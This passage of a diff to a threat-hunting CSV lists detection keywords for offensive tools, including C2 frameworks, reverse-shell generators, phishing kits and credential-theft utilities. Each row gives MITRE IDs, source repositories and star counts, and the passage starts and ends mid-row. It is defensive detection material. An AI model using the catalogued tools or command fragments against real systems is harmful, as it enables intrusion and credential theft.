T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc mssql *--get-file*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc mssql *--local-auth*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc ssh *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc winrm * -X *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc*nxcdb.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxcdb-zipapp-*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nysm.skel.h*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*nysm-master.zip*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" "*nyxgeek*","offensive_tool_keyword","Github Username","github user hosting exploitation and recon tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/nyxgeek","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nyxgeek/lyncsmash*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*nyxgeek/ntlmscan*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" -"*nyxgeek/teamstracker*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" -"*-o kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*nyxgeek/teamstracker*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*-o kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*o_getprivs*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*o365-Attack-Toolkit*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" -"*o365-attack-toolkit*","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","954","218","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" +"*o365-attack-toolkit*","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","955","218","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" "*o365creeper.git*","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","3","265","57","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" "*o365creeper.py*","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","3","265","57","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" "*o365creeper-master*","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","3","265","57","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" @@ -14276,15 +14441,15 @@ "*o365recon-master*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*oab-parse.py*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*oaburl.py */*:*@* -e *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*obfuscate.py grunt*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*obfuscate.py grunt*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Obfuscate.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*obfuscate/shellter*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*obfuscate_cmdlet*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*obfuscate_cmdlet*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*obfuscate_command*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*obfuscated_module_source/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*obfuscated_module_source/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*obfuscator*antidisassembly.*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*obfuscator.cpp*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" -"*obfuskittiedump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*obfuskittiedump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*objects_constrained_delegation_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*objects_rbcd_delegation_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*objects_unconstrained_delegation_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" @@ -14294,20 +14459,20 @@ "*obscuritylabs/RAI/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*octetsplicer/LAZYPARIAH*","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "*Octoberfest7/KDStab*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" -"*Octoberfest7/TeamsPhisher*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*Octoberfest7/TeamsPhisher*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" "*octopus.py *","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*OEP_Hiijack_Inject_Load*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" "*offensive_notion.exe*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*offensive_notion_darwin_*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*offensive_notion_linux_*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*offensive_notion_win_*.exe*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" -"*OffensiveCSharp*DriverQuery*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*OffensiveCSharp*ETWEventSubscription*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*OffensiveCSharp-master*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*office2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*office365userenum.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Office-DDE-Payloads*","offensive_tool_keyword","Office-DDE-Payloads","Collection of scripts and templates to generate Word and Excel documents embedded with the DDE. macro-less command execution technique described by @_staaldraad and @0x5A1F (blog post link in References section below). Intended for use during sanctioned red team engagements and/or phishing campaigns.","T1221 - T1222 - T1223","TA0001 - TA0002 - TA0003","N/A","N/A","Phishing","https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads","1","1","N/A","N/A","7","623","161","2023-07-16T08:22:24Z","2017-10-27T22:19:17Z" -"*Offline_WinPwn.ps1*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - 